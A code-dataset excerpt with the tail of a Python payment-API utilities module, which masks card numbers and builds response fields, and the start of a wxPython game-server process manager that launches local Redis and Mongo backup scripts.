translate_acquiring_refund_response(protobuf_response, tps_response):\n if tps_response.success:\n acq_transaction_number = get_message_from_response(tps_response, tps_response_codes.INFO_CD_ACQ_TRANSACTION_NUMBER, \"\")\n _update_acquiring_transaction_result(protobuf_response, acq_transaction_number)\n\n _add_response(protobuf_response, INFO_OPERATION_COMPLETED)\n _add_response(protobuf_response, response_codes.INFO_ACQUIRING_REFUND_SUCCESS)\n\ndef _update_acquiring_transaction_result(protobuf_response, acq_transaction_number):\n _add_result(protobuf_response, result_keys.RESULT_ACQ_TRANSACTION_NO, acq_transaction_number)\n\n cd_transaction = find_cd_transaction_by_acq_txn_no(acq_transaction_number)\n if cd_transaction:\n card_id = cd_transaction.cd_card_id\n card_holder = find_card_holder_by_card_id(card_id)\n masked_pan = string_utils.get_last_characters(card_holder.pan,4)\n\n _add_result(protobuf_response, result_keys.RESULT_ACQ_ORDER_INFO, cd_transaction.acq_order_info)\n _add_result(protobuf_response, result_keys.RESULT_ACQ_MERCH_TXN_REF, cd_transaction.acq_merchant_txn_ref)\n _add_result(protobuf_response, result_keys.RESULT_ACQ_MERCHANT_ID, cd_transaction.acq_merchant_id)\n _add_result(protobuf_response, result_keys.RESULT_ACQ_AMOUNT_IN_CENTS, string_utils.format_in_cents(cd_transaction.tps_transaction.amount))\n _add_result(protobuf_response, result_keys.RESULT_ACQ_CURRENCY, cd_transaction.tps_transaction.tps_currency.name)\n _add_result(protobuf_response, result_keys.RESULT_CARD_MASKED_PAN, masked_pan)\n\n if cd_transaction.acq_purchase_txn_number:\n _add_result(protobuf_response, result_keys.RESULT_ACQ_PURCHASE_TRANSACTION_NO, cd_transaction.acq_purchase_txn_number)\n\ndef _update_card_id_mapping_to_response(protobuf_response, tps_response):\n customer_card_id = get_message_from_response(tps_response, tps_response_codes.INFO_CD_CUSTOMER_CARD_ID, \"\")\n card_id = get_message_from_response(tps_response, tps_response_codes.INFO_CD_CARD_ID, \"\")\n\n required_return_card_id = (customer_card_id!='' or card_id!='')\n mapped_card_id = card_id\n if customer_card_id!=u'':\n mapped_card_id = customer_card_id\n\n if required_return_card_id:\n _add_response(protobuf_response, INFO_REF,\n \"%s - %s\" % (tps_response_codes.INFO_CD_CARD_ID, mapped_card_id))\n\n\ndef generate_token(client_code):\n salt = string_utils.random_string()\n time = get_now().isoformat()\n message = client_code + '\\0' + time + '\\0' + salt\n hashAlgorithm = hashlib.new('sha256')\n hashAlgorithm.update(message)\n return hashAlgorithm.hexdigest()\n\ndef _add_result(protobuf_response, key, value):\n result_add = protobuf_response.results.add()\n result_add.resultKey = key\n result_add.resultValue = value\n\n\ndef _set_status_code_success(protobuf_response):\n protobuf_response.statusCode = STATUS_SUCCESS\n\n\ndef _set_status_code_fail(protobuf_response):\n protobuf_response.statusCode = STATUS_FAIL\n\n\ndef _set_status_code_processing(protobuf_response):\n protobuf_response.statusCode = STATUS_PROCESSING\n\n\ndef _update_protobuf_response_header(protobuf_response):\n fill_cd_response_header_fields(protobuf_response)\n\n\ndef _update_protobuf_response_request_header(protobuf_response, protobuf_request=None):\n if protobuf_request:\n request_header = protobuf_response.requestHeader\n request_header.version = protobuf_request.header.version\n request_header.messageId = protobuf_request.header.messageId\n request_header.clientId = protobuf_request.header.clientId\n request_header.timestamp = 
protobuf_request.header.timestamp\n request_header.messageType = protobuf_request.header.messageType\n return protobuf_response\n\ndef is_image_file_ext(filename):\n file_ext = string_utils.get_file_ext(filename)\n if file_ext.lower() in settings.KYC_FILE_UPLOAD_IMAGE_ALLOWED_EXT:\n return True\n return False\n\ndef mask_pan(pan):\n return '%s%s' % (('*' * (len(pan) - 4)) , pan[-4:])\n\ndef mask_cvv(cvv):\n return '*' * len(cvv)\n\ndef mask_json_request_sensitive_info(json_request_dict):\n masked_json_request_dict = copy.deepcopy(json_request_dict)\n if 'acquiringPurchaseInfo' in masked_json_request_dict:\n purchase_info = masked_json_request_dict['acquiringPurchaseInfo']\n if 'pan' in purchase_info:\n purchase_info['pan'] = mask_pan(purchase_info['pan'])\n if 'cvv' in purchase_info:\n purchase_info['cvv'] = mask_cvv(purchase_info['cvv'])\n return masked_json_request_dict\n\ndef mask_protobuf_request_sensitive_info(protobuf_request):\n masked_protobuf_request = CardDirectorRequest()\n masked_protobuf_request.CopyFrom(protobuf_request)\n acq_purchase_info = masked_protobuf_request.acquiringPurchaseInfo\n if acq_purchase_info.HasField('pan'):\n acq_purchase_info.pan = mask_pan(acq_purchase_info.pan)\n if acq_purchase_info.HasField('cvv'):\n acq_purchase_info.cvv = mask_cvv(acq_purchase_info.cvv)\n return masked_protobuf_request\n\nclass Namespace: pass\n","sub_path":"apps/carddirector/cd_api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"81845967","text":"# !/usr/bin/env python\n# encoding: utf-8\n\n'''\n@author: senlian\n@license: (C) Copyright 2013-2017, Node Supply Chain Manager Corporation Limited.\n@file: ProcessManager.py\n@time: 2018/8/13 9:03\n@module:python -m pip install wxpython\n@desc:To start Game processes and Record the pid.\n'''\nimport wx, wx.adv, wx.grid, wx.ribbon\nimport wx.stc as STC\nimport wx.lib.agw.customtreectrl as CT\nimport os, sys, glob, re, time, gc, psutil\nimport json, csv, shutil\nimport threading, multiprocessing\nimport win32file\n# import signal\nimport chardet\n# from Queue import Queue\nfrom psutil import Process\nfrom common.B64data import *\nfrom common import frozen\nfrom common.SenLian_Process import *\nfrom common.Senlian_Win32 import Window\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\nscriptPath = os.path.normpath(os.path.abspath(__file__))\nscriptDir = os.path.dirname(scriptPath)\n\nSystemWindow = Window()\n\nID_OpenDir = wx.NewId()\nID_RootFrame = wx.NewId()\nID_MenuBar = wx.NewId()\nID_ToolBar = wx.NewId()\nID_MidWindow = wx.NewId()\nID_StatusBar = wx.NewId()\nID_Switch = wx.NewId()\nID_Start = wx.NewId()\nID_Pause = wx.NewId()\nID_Close = wx.NewId()\nID_MONGO = wx.NewId()\nID_REDIS = wx.NewId()\nID_PREPARE = wx.NewId()\nID_AFTER = wx.NewId()\n\nTIME_SLEEP = 1\n\nPRE_PY_SCRIPT = os.path.abspath(\"./prepare.py\")\nREDIS_PY_SCRIPT = os.path.abspath(\"./redis_backup.py\")\nMONGO_PY_SCRIPT = os.path.abspath(\"./mongo_backup.py\")\nAFTER_PY_SCRIPT = os.path.abspath(\"./after.py\")\nLOG_FILE_PATH = os.path.abspath(\"./ProcessManager.log\")\n\nwildcard = u\"py files (*.py)|*.py|\" \\\n \"bat files (*.bat)|*.bat|\" \\\n \"All files (*.*)|*.*\"\n\n\ndef wait_time(seconds):\n time.sleep(int(seconds))\n\n\ndef get_code(item):\n return chardet.detect(item).get(\"encoding\", \"utf-8\")\n\n\ndef explorer_select_file(filepath):\n if os.path.isfile(filepath):\n os.popen('explorer.exe /select, \"{0}\"'.format(filepath))\n elif 
os.path.isdir(filepath):\n os.startfile(filepath, \"explore\")\n # os.popen('explorer.exe /n, \"{0}\"'.format(filepath))\n else:\n return\n\n # TODO: 主框架\n\n\ndef OpenDirDialog(defaultDir='', parent=None):\n if not parent:\n return False\n\n dlg = wx.DirDialog(parent, message=u\"打开路径\",\n defaultPath=defaultDir,\n style=wx.DD_DEFAULT_STYLE)\n targetDir = defaultDir\n if dlg.ShowModal() == wx.ID_OK:\n targetDir = dlg.GetPath()\n dlg.Destroy()\n return targetDir\n\n\ndef OpenFileDialog(defaultDir='', defaultFile='', parent=None):\n if not defaultDir:\n defaultDir = defaultFile\n if not parent:\n return False\n\n dlg = wx.FileDialog(parent, message=u\"另存为\",\n defaultDir=defaultDir,\n defaultFile=defaultFile,\n wildcard=wildcard,\n style=wx.FD_OPEN)\n targetFile = defaultFile\n if dlg.ShowModal() == wx.ID_OK:\n targetFile = dlg.GetPath()\n dlg.Destroy()\n return targetFile\n\n\nclass RootFrame(wx.Frame):\n def __init__(self, parent=None):\n super(RootFrame, self).__init__(parent=parent, id=ID_RootFrame)\n self.settings()\n wx.CallAfter(self.initUI)\n\n def settings(self):\n self.SetTitle(u'游戏进程管理器')\n self.SetSize((1080, 720))\n self.TaskBarIcon = None\n icon = PyEmbeddedImage(B64_POKER128).GetIcon()\n self.SetWindowStyle(wx.DEFAULT_FRAME_STYLE)\n self.SetIcon(icon)\n self.Center()\n self.JsonObj = json.loads(open('./startApp.json', 'r').read().replace('\\\\', '/'))\n\n def initUI(self):\n MenuBar(self)\n ToolBar(self)\n StatusBar(self)\n wx.CallAfter(MidWindow, self)\n self.GetMenuBar().Bind(wx.EVT_MENU, self.OnExit, id=wx.ID_EXIT)\n self.Bind(wx.EVT_CLOSE, self.OnExit, self)\n self.Bind(wx.EVT_ICONIZE, self.OnIconfiy)\n\n def infoBox(self, msg=\"页面加载中...\"):\n infoDialog = wx.MessageDialog(parent=self, message=msg, caption=\"提示\", style=wx.ICON_INFORMATION)\n return infoDialog.ShowModal()\n\n def warnBox(self, msg=\"确认要继续操作吗?\"):\n warnDialog = wx.MessageDialog(parent=self, message=msg, caption=\"警告\",\n style=wx.OK | wx.CANCEL | wx.ICON_EXCLAMATION)\n return warnDialog.ShowModal()\n\n def errorBox(self, msg=\"操作失败,请排查原因!\"):\n errorDialog = wx.MessageDialog(parent=self, message=msg, caption=\"错误\",\n style=wx.OK | wx.CANCEL | wx.ICON_ERROR)\n return errorDialog.ShowModal()\n\n def OnIconfiy(self, e):\n if not self.IsIconized():\n if not self.IsShown():\n self.Show()\n self.Raise()\n else:\n if self.IsShown():\n self.Hide()\n self.TaskBarIcon = TaskBarIcon(self)\n return e.Skip()\n\n def OnExit(self, e):\n self.SetStatusText('正在退出...', 1)\n try:\n self.SetStatusText('线程退出...', 2)\n self.FindWindowById(ID_MidWindow, self).PageOne.RightPanel.ReSetJob()\n self.SetStatusText('数据保存...', 2)\n self.FindWindowById(ID_MidWindow, self).PageOne.RightPanel.SaveToCsv()\n self.SetStatusText('日志保存...', 2)\n self.FindWindowById(ID_MidWindow, self).PageTwo.SaveToFile(e)\n except Exception as e:\n print(e)\n self.Destroy()\n if e:\n e.Skip()\n return gc.collect()\n\n\n# TODO: 菜单栏\nclass MenuBar(wx.MenuBar):\n def __init__(self, parent=None, id=ID_MenuBar):\n super(MenuBar, self).__init__()\n if parent:\n self.parent = parent\n self.setItems()\n self.parent.SetMenuBar(self)\n\n def setItems(self):\n FileMenu = wx.Menu()\n OptionMenu = wx.Menu()\n ViewMenu = wx.Menu()\n HelpMenu = wx.Menu()\n\n FileMenu.Append(ID_OpenDir, u\"打开目录(&O)\\tCtrl+O\", u\"打开目录\")\n FileMenu.Append(wx.ID_FILE, u\"设置(&S)...\\tCtrl+S\", u\"设置\")\n FileMenu.AppendSeparator()\n FileMenu.Append(wx.ID_EXIT, u\"退出(&Q)...\\tCtrl+Q\", u\"退出\")\n\n OptionMenu.Append(ID_PREPARE, u\"环境准备\", u\"执行环境准备脚本\", kind=wx.ITEM_CHECK).Check()\n 
OptionMenu.Append(ID_REDIS, u\"备份Redis\", u\"执行Redis备份脚本\", kind=wx.ITEM_CHECK).Check()\n OptionMenu.Append(ID_MONGO, u\"备份Mongo\", u\"执行Mongo备份脚本\", kind=wx.ITEM_CHECK).Check()\n OptionMenu.Append(ID_AFTER, u\"环境恢复\", u\"执行环境恢复脚本\", kind=wx.ITEM_CHECK).Check()\n\n self.Tools = ViewMenu.Append(ID_ToolBar, u'工具栏(&T)', u'工具栏', kind=wx.ITEM_CHECK)\n self.Tools.Check(True)\n self.Status = ViewMenu.Append(ID_StatusBar, u'状态栏(&S)', u'状态栏', kind=wx.ITEM_CHECK)\n self.Status.Check(True)\n\n HelpMenu.Append(wx.ID_HELP, u\"说明(&H)\", u\"工具帮助信息\")\n HelpMenu.Append(wx.ID_ABOUT, u\"关于(&A)\", u\"作者@senlian\")\n\n self.Append(FileMenu, u'文件(&F)')\n self.Append(OptionMenu, u'选项(&O)')\n self.Append(ViewMenu, u'查看(&H)')\n self.Append(HelpMenu, u'帮助(&H)')\n FileMenu.Bind(wx.EVT_MENU, self.OpenWorkDir, id=ID_OpenDir)\n FileMenu.Bind(wx.EVT_MENU, self.FileMenuEvt, id=wx.ID_FILE)\n ViewMenu.Bind(wx.EVT_MENU, self.ToggleToolBar, id=ID_ToolBar)\n ViewMenu.Bind(wx.EVT_MENU, self.ToggleStatusBar, id=ID_StatusBar)\n\n def OpenWorkDir(self, e):\n toolpath = os.path.splitext(scriptPath)[0] + '.exe'\n explorer_select_file(toolpath)\n e.Skip()\n\n def FileMenuEvt(self, e):\n setDialog = SetBasicDialog(self.parent, u'设置面板')\n if setDialog.ShowModal() == wx.ID_OK:\n setDialog.SetGlobal()\n e.Skip()\n\n def ToggleToolBar(self, e):\n ToolBar = self.parent.GetToolBar()\n if self.Tools.IsChecked():\n ToolBar.Show()\n else:\n ToolBar.Hide()\n ToolBar.Realize()\n if e:\n e.Skip()\n\n def ToggleStatusBar(self, e):\n BtmStatusBar = self.parent.GetStatusBar()\n if self.Status.IsChecked():\n StatusBar(self.parent)\n curPath = self.FindWindowById(ID_MidWindow, self.parent).PageOne.LeftPanel.GetPath()\n self.parent.SetStatusText(curPath, 0)\n else:\n BtmStatusBar.Destroy()\n if e:\n e.Skip()\n\n\n# TODO: 工具栏\nclass ToolBar(wx.ToolBar):\n def __init__(self, parent=None, id=ID_ToolBar):\n super(ToolBar, self).__init__(parent=parent, id=id, style=wx.TB_NODIVIDER | wx.TB_FLAT, name=u'工具栏')\n self.root = parent\n if self.root:\n self.setItems()\n self.Realize()\n self.root.SetToolBar(self)\n # self.Bind(wx.EVT_TOOL, self.ToggleBitmap)\n\n def setItems(self):\n self.AddTool(ID_Start, 'start', GetBitmap(B64_START24), u'开服').SetClientData(True)\n self.AddTool(ID_Pause, 'pause', GetBitmap(B64_PAUSE24), u'暂停').SetClientData(True)\n self.AddTool(ID_Close, 'close', GetBitmap(B64_CLOSE24), u'关服').SetClientData(True)\n self.AddTool(wx.ID_REFRESH, 'refresh', GetBitmap(B64_REFRESH24), u'刷新').SetClientData(True)\n self.AddStretchableSpace()\n self.AddTool(ID_REDIS, 'redis', GetBitmap(B64_REDIS24), u'Redis').SetClientData(True)\n self.AddTool(ID_MONGO, 'mongo', GetBitmap(B64_MONGO24), u'Mongo').SetClientData(True)\n # self.FindById(ID_REDIS).GetPosition()\n # self.InsertSeparator(pos=4)\n self.EnableTool(ID_Start, False)\n self.EnableTool(ID_Pause, False)\n self.EnableTool(ID_Close, False)\n\n def ToggleBitmap(self, curId):\n # curId = e.GetId()\n curItem = self.FindById(curId)\n\n preHelp = curItem.GetShortHelp()\n preData = curItem.GetClientData()\n # print('preData=', preData)\n self.root.SetStatusText(preHelp, 2)\n\n if curId != ID_Pause:\n if curId == ID_Start:\n self.EnableTool(ID_Close, not preData)\n if curId == ID_Close:\n self.EnableTool(ID_Start, not preData)\n if not preData:\n self.SetPauseToolStyle(preData)\n self.EnableTool(ID_Pause, preData)\n self.SetStartToolStyle(preData)\n self.SetCloseToolStyle(preData)\n else:\n self.SetPauseToolStyle(preData)\n\n self.Realize()\n\n def SetStartToolStyle(self, flag=True):\n if not 
self.GetToolEnabled(ID_Start):\n return\n bitmap = B64_STOP24 if flag else B64_START24\n help = u\"停止\" if flag else u\"开服\"\n\n self.SetToolNormalBitmap(ID_Start, GetBitmap(bitmap))\n self.SetToolShortHelp(ID_Start, help)\n self.SetToolClientData(ID_Start, not flag)\n\n def SetPauseToolStyle(self, flag=True):\n if not self.GetToolEnabled(ID_Pause):\n return\n bitmap = B64_GOON24 if flag else B64_PAUSE24\n help = u\"继续\" if flag else u\"暂停\"\n\n self.SetToolNormalBitmap(ID_Pause, GetBitmap(bitmap))\n self.SetToolShortHelp(ID_Pause, help)\n self.SetToolClientData(ID_Pause, not flag)\n\n def SetCloseToolStyle(self, flag=True):\n if not self.GetToolEnabled(ID_Close):\n return\n bitmap = B64_STOP24 if flag else B64_CLOSE24\n help = u\"停止\" if flag else u\"关服\"\n\n self.SetToolNormalBitmap(ID_Close, GetBitmap(bitmap))\n self.SetToolShortHelp(ID_Close, help)\n self.SetToolClientData(ID_Close, not flag)\n\n\n# TODO: 状态栏\nclass StatusBar(wx.StatusBar):\n def __init__(self, parent=None, id=ID_StatusBar):\n super(StatusBar, self).__init__(parent=parent, id=id, style=65840, name=u'状态栏')\n self.SetFieldsCount(3)\n self.SetStatusWidths([-2, -2, -1])\n self.Show()\n if parent:\n parent.SetStatusBar(self)\n\n\n# TODO: 设置面板\nclass SetBasicDialog(wx.Dialog):\n def __init__(self, parent, title):\n super(SetBasicDialog, self).__init__(parent, title=title, size=(480, 260))\n self.root = parent\n self.initUI()\n self.GetTemplate()\n\n def initUI(self):\n vBox = wx.BoxSizer(wx.VERTICAL)\n gridBox = wx.FlexGridSizer(5, 3, 18, 5)\n\n PrePyLabel = wx.StaticText(self, label=u'环境准备脚本', size=(120, 20))\n self.PrePyText = wx.TextCtrl(self, size=(240, 20), value=PRE_PY_SCRIPT)\n PrePyBTN = wx.Button(self, wx.ID_ANY, label=\"...\", size=(25, 20))\n\n RedisPathLabel = wx.StaticText(self, label=u'Redis备份脚本', size=(120, 20))\n self.RedisPathText = wx.TextCtrl(self, size=(240, 20), value=REDIS_PY_SCRIPT)\n RedisPathBTN = wx.Button(self, wx.ID_ANY, label=\"...\", size=(25, 20))\n\n MongoPathLabel = wx.StaticText(self, label=u'Mongo备份脚本', size=(120, 20))\n self.MongoPathText = wx.TextCtrl(self, size=(240, 20), value=MONGO_PY_SCRIPT)\n MongoPathBTN = wx.Button(self, wx.ID_ANY, label=\"...\", size=(25, 20))\n\n AfterPyLabel = wx.StaticText(self, label=u'环境恢复脚本', size=(120, 20))\n self.AfterPyText = wx.TextCtrl(self, size=(240, 20), value=AFTER_PY_SCRIPT)\n AfterPyBTN = wx.Button(self, wx.ID_ANY, label=\"...\", size=(25, 20))\n\n TimeSleepLabel = wx.StaticText(self, label=u'停顿时间', size=(120, 20))\n self.TimeSleepText = wx.TextCtrl(self, size=(240, 20), value=str(TIME_SLEEP))\n TimeSleepUnit = wx.StaticText(self, label=u'秒', size=(120, 20))\n\n gridBox.Add(PrePyLabel)\n gridBox.Add(self.PrePyText, 1, wx.EXPAND)\n gridBox.Add(PrePyBTN)\n\n gridBox.Add(RedisPathLabel)\n gridBox.Add(self.RedisPathText, 1, wx.EXPAND)\n gridBox.Add(RedisPathBTN)\n\n gridBox.Add(MongoPathLabel)\n gridBox.Add(self.MongoPathText, 1, wx.EXPAND)\n gridBox.Add(MongoPathBTN)\n\n gridBox.Add(AfterPyLabel)\n gridBox.Add(self.AfterPyText, 1, wx.EXPAND)\n gridBox.Add(AfterPyBTN)\n\n gridBox.Add(TimeSleepLabel)\n gridBox.Add(self.TimeSleepText, 1, wx.EXPAND)\n gridBox.Add(TimeSleepUnit)\n\n wx.Button(self, wx.ID_OK, label=u\"确认\", size=(50, 20), pos=(180, 200))\n wx.Button(self, wx.ID_CANCEL, label=u\"取消\", size=(50, 20), pos=(260, 200))\n\n vBox.Add(gridBox, proportion=2, flag=wx.ALL | wx.EXPAND, border=15)\n self.SetSizer(vBox)\n\n self.Bind(wx.EVT_BUTTON, self.SetRrePyPath, PrePyBTN)\n self.Bind(wx.EVT_BUTTON, self.SetRedisPath, RedisPathBTN)\n 
self.Bind(wx.EVT_BUTTON, self.SetMongoPath, MongoPathBTN)\n self.Bind(wx.EVT_BUTTON, self.SetAfterPyPath, AfterPyBTN)\n\n def GetTemplate(self):\n self.prepareScript = self.PrePyText.GetValue()\n self.redisScript = self.RedisPathText.GetValue()\n self.mongoScript = self.MongoPathText.GetValue()\n self.afterScript = self.AfterPyText.GetValue()\n self.timeSleep = self.TimeSleepText.GetValue()\n\n def SetRrePyPath(self, e):\n newpath = OpenFileDialog(PRE_PY_SCRIPT, PRE_PY_SCRIPT, self)\n self.PrePyText.SetValue(newpath)\n self.GetTemplate()\n if e:\n e.Skip()\n\n def SetRedisPath(self, e):\n newpath = OpenFileDialog(REDIS_PY_SCRIPT, REDIS_PY_SCRIPT, self)\n self.RedisPathText.SetValue(newpath)\n self.GetTemplate()\n if e:\n e.Skip()\n\n def SetMongoPath(self, e):\n newpath = OpenFileDialog(MONGO_PY_SCRIPT, MONGO_PY_SCRIPT, self)\n self.MongoPathText.SetValue(newpath)\n self.GetTemplate()\n if e:\n e.Skip()\n\n def SetAfterPyPath(self, e):\n newpath = OpenFileDialog(AFTER_PY_SCRIPT, AFTER_PY_SCRIPT, self)\n self.AfterPyText.SetValue(newpath)\n self.GetTemplate()\n if e:\n e.Skip()\n\n def SetGlobal(self):\n global PRE_PY_SCRIPT, REDIS_PY_SCRIPT, MONGO_PY_SCRIPT, AFTER_PY_SCRIPT, TIME_SLEEP\n PRE_PY_SCRIPT = self.prepareScript\n REDIS_PY_SCRIPT = self.redisScript\n MONGO_PY_SCRIPT = self.mongoScript\n AFTER_PY_SCRIPT = self.afterScript\n TIME_SLEEP = int(self.TimeSleepText.GetValue())\n\n\n# TODO: 主界面\nclass MidWindow(wx.Notebook):\n def __init__(self, parent=None, id=ID_MidWindow):\n super(MidWindow, self).__init__(parent=parent, id=id, name='Main',\n style=wx.NB_TOP | wx.NB_FIXEDWIDTH | wx.NB_FLAT, size=parent.GetSize())\n self.root = parent\n self.JsonObj = self.root.JsonObj\n # self.taskList = Queue()\n self.NowJob = None\n\n self.PageOne = MainPage(self)\n self.PageTwo = SecondSheet(self)\n\n self.AddPage(self.PageOne, u'主页')\n self.AddPage(self.PageTwo, u'操作日志')\n\n self.PageOneLeft = self.PageOne.LeftPanel\n self.PageOneRight = self.PageOne.RightPanel\n\n self.ToolBar = self.root.GetToolBar()\n self.ToolBar.Bind(wx.EVT_TOOL, self.BindToolEvt)\n self.ToolBar.Bind(wx.EVT_TOOL, self.SaveRedis, id=ID_REDIS)\n self.ToolBar.Bind(wx.EVT_TOOL, self.SaveMongo, id=ID_MONGO)\n self.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED, self.PageChangeEvt)\n\n def BindToolEvt(self, e):\n BindId = e.GetId()\n # 获取暂停键之前的状态信息\n pauseTool = self.ToolBar.FindById(ID_Pause)\n prePauseBitmap = pauseTool.GetNormalBitmap()\n prePauseShortHelp = pauseTool.GetShortHelp()\n prePauseClientData = pauseTool.GetClientData()\n if BindId in [ID_Start, ID_Close, ID_Pause]:\n self.ToolBar.ToggleBitmap(BindId)\n\n if BindId == ID_Pause:\n if self.NowJob:\n if self.NowJob.isPaused():\n self.NowJob.pause()\n else:\n self.NowJob.restart()\n\n if BindId in [ID_Start, ID_Close]:\n ProcessList = self.GetProcessList()\n preFlag = False if not self.NowJob else self.NowJob.isPaused()\n\n # 任务暂停\n if self.NowJob:\n self.NowJob.pause()\n\n # 取消操作\n if self.root.warnBox() == wx.ID_CANCEL:\n if self.NowJob and preFlag:\n self.NowJob.restart()\n\n self.ToolBar.ToggleBitmap(BindId)\n pauseTool.SetNormalBitmap(prePauseBitmap)\n pauseTool.SetShortHelp(prePauseShortHelp)\n pauseTool.SetClientData(prePauseClientData)\n self.ToolBar.Realize()\n return e.Skip()\n\n if BindId is not ID_Pause:\n if self.NowJob and self.NowJob.isAlive():\n self.NowJob.stop()\n self.NowJob = None\n gc.collect()\n else:\n del self.NowJob\n gc.collect()\n self.PageTwo.AppendInfo(\"选择列表:\\n{0}\".format(\",\".join(ProcessList)))\n self.NowJob = ThreadTask(ProcessList=ProcessList, 
parent=self, BindId=BindId)\n self.NowJob.start()\n e.Skip()\n\n def PageChangeEvt(self, e):\n wx.CallAfter(self.SetToolBar)\n if e:\n e.Skip()\n\n def SetToolBar(self):\n if (self.GetCurrentPage() == self.PageTwo):\n self.ToolBar.InsertSeparator(4)\n # saveTool = self.ToolBar.CreateTool(wx.ID_SAVE, 'save', GetBitmap(B64_SAVE24), shortHelp=u'保存日志').SetClientData(True)\n # InsertTool(pos, toolId, label, bitmap, bmpDisabled=NullBitmap, kind=ITEM_NORMAL, shortHelp=EmptyString, longHelp=EmptyString, clientData=None) -> ToolBarToolBase\n self.ToolBar.InsertTool(pos=5, toolId=wx.ID_SAVE, label='save', bitmap=GetBitmap(B64_SAVE24),\n shortHelp=u'保存日志', clientData=True)\n self.ToolBar.InsertTool(pos=6, toolId=wx.ID_CLEAR, label='refresh', bitmap=GetBitmap(B64_CLEAR24),\n shortHelp=u'清空日志', clientData=True)\n self.ToolBar.InsertSeparator(7)\n # self.ToolBar.AddTool(wx.ID_CLEAR, 'refresh', GetBitmap(B64_CLEAR24), u'清空日志').SetClientData(True)\n else:\n self.ToolBar.DeleteToolByPos(7)\n self.ToolBar.DeleteToolByPos(4)\n self.ToolBar.RemoveTool(wx.ID_SEPARATOR)\n self.ToolBar.RemoveTool(wx.ID_SAVE)\n self.ToolBar.RemoveTool(wx.ID_CLEAR)\n self.ToolBar.Realize()\n\n def GetProcessList(self):\n return self.PageOneLeft.GetCheckedItems([], self.PageOneLeft.GetSelection())\n\n def GetParameters(self, exe):\n for key in self.JsonObj.keys():\n curJson = self.JsonObj.get(key, {})\n if curJson.has_key(exe):\n return curJson.get(exe, {}).get(\"parameters\", None)\n return []\n\n def SaveRedis(self, e=None):\n if os.path.isfile(REDIS_PY_SCRIPT) and os.path.splitext(REDIS_PY_SCRIPT)[1].lower() == '.py':\n self.root.SetStatusText(REDIS_PY_SCRIPT, 0)\n self.root.SetStatusText(\"正在执行外部脚本...\", 1)\n self.PageTwo.AppendWarn('正在执行外部脚本,{0}'.format(REDIS_PY_SCRIPT))\n os.popen(\"python \" + REDIS_PY_SCRIPT)\n self.root.SetStatusText(\"脚本调用结束\", 1)\n self.PageTwo.AppendInfo('脚本调用结束')\n else:\n self.root.SetStatusText(\"外部redis脚本不存在\", 1)\n self.PageTwo.AppendError('外部准备脚本不存在,{0}'.format(REDIS_PY_SCRIPT))\n if e:\n e.Skip()\n\n def SaveMongo(self, e=None):\n if os.path.isfile(MONGO_PY_SCRIPT) and os.path.splitext(MONGO_PY_SCRIPT)[1].lower() == '.py':\n self.root.SetStatusText(MONGO_PY_SCRIPT, 0)\n self.root.SetStatusText(\"正在执行外部脚本...\", 1)\n self.PageTwo.AppendWarn('正在执行外部脚本,{0}'.format(MONGO_PY_SCRIPT))\n os.popen(\"python \" + MONGO_PY_SCRIPT)\n self.root.SetStatusText(\"脚本调用结束\", 1)\n self.PageTwo.AppendInfo('脚本调用结束')\n else:\n self.root.SetStatusText(\"外部mongo脚本不存在\", 1)\n self.PageTwo.AppendError('外部准备脚本不存在,{0}'.format(MONGO_PY_SCRIPT))\n if e:\n e.Skip()\n\n\n# TODO: 主页\nclass MainPage(wx.SplitterWindow):\n def __init__(self, parent=None):\n super(MainPage, self).__init__(parent=parent, style=wx.SP_NOBORDER, size=parent.GetSize())\n self.parent = parent\n self.root = self.parent.root\n\n self.initUI()\n\n def initUI(self):\n self.RightPanel = PidGrid(self)\n self.LeftPanel = GenerateDirTree(self)\n self.SetMinimumPaneSize(200)\n self.SplitVertically(self.LeftPanel, self.RightPanel, 100)\n\n\n# TODO: 操作日志\nclass SecondSheet(STC.StyledTextCtrl):\n def __init__(self, parent=None):\n self.parent = parent\n self.root = self.parent.root\n self.TextStyle = STC.STC_STYLE_DEFAULT\n\n super(SecondSheet, self).__init__(parent=self.parent, id=-1, style=self.TextStyle)\n\n self.SetMarginWidth(2, 16)\n self.SetMarginType(1, STC.STC_MARGIN_NUMBER)\n\n self.root.GetToolBar().Bind(wx.EVT_TOOL, self.ClearText, id=wx.ID_CLEAR)\n self.root.GetToolBar().Bind(wx.EVT_TOOL, self.SaveToFile, id=wx.ID_SAVE)\n\n def SaveToFile(self, e):\n if 
not os.path.isdir(os.path.dirname(LOG_FILE_PATH)):\n os.makedirs(os.path.dirname(LOG_FILE_PATH))\n wx.CallAfter(self.SaveFile, filename=LOG_FILE_PATH)\n if e:\n e.Skip()\n\n def ClearText(self, e):\n wx.CallAfter(self.ClearAll)\n if e:\n e.Skip()\n\n def AppendInfo(self, text):\n text = str(time.strftime(\"[%y-%m-%d %H:%M:%S INFO] {0}\\r\\n\".format(text)))\n wx.CallAfter(self.AppendText, text=text)\n self.ScrollLines(1)\n\n def AppendWarn(self, text):\n text = str(time.strftime(\"[%y-%m-%d %H:%M:%S WARN] {0}\\r\\n\".format(text)))\n wx.CallAfter(self.AppendText, text=text)\n self.ScrollLines(1)\n\n def AppendError(self, text):\n text = str(time.strftime(\"[%y-%m-%d %H:%M:%S ERROR] {0}\\r\\n\".format(text)))\n wx.CallAfter(self.AppendText, text=text)\n self.ScrollLines(1)\n\n\n# TODO: 生成主页更新项树形结构\nclass GenerateDirTree(CT.CustomTreeCtrl):\n def __init__(self, parent=None):\n self.parent = parent\n self.root = self.parent.root\n self.RightPanel = self.parent.RightPanel\n self.JsonObj = self.root.JsonObj\n\n agwStyle = CT.TR_DEFAULT_STYLE + CT.TR_AUTO_CHECK_CHILD + CT.TR_AUTO_CHECK_PARENT + CT.TR_HIDE_ROOT\n super(GenerateDirTree, self).__init__(parent=self.parent, agwStyle=agwStyle)\n\n self.SetBackgroundColour(wx.WHITE)\n self.addImageList()\n\n self.itemKeys = sorted(self.JsonObj.keys(), key=lambda key: self.JsonObj[key]['settings']['priority'])\n self.JsonExe = self.SortCheckedItem()\n wx.CallLater(3000, self.CreateTreeCtrl)\n\n self.Bind(CT.EVT_TREE_ITEM_CHECKED, self.BindChecked)\n self.Bind(CT.EVT_TREE_SEL_CHANGED, self.BindChecked)\n self.Bind(CT.EVT_TREE_ITEM_RIGHT_CLICK, self.RightClickEvt)\n # 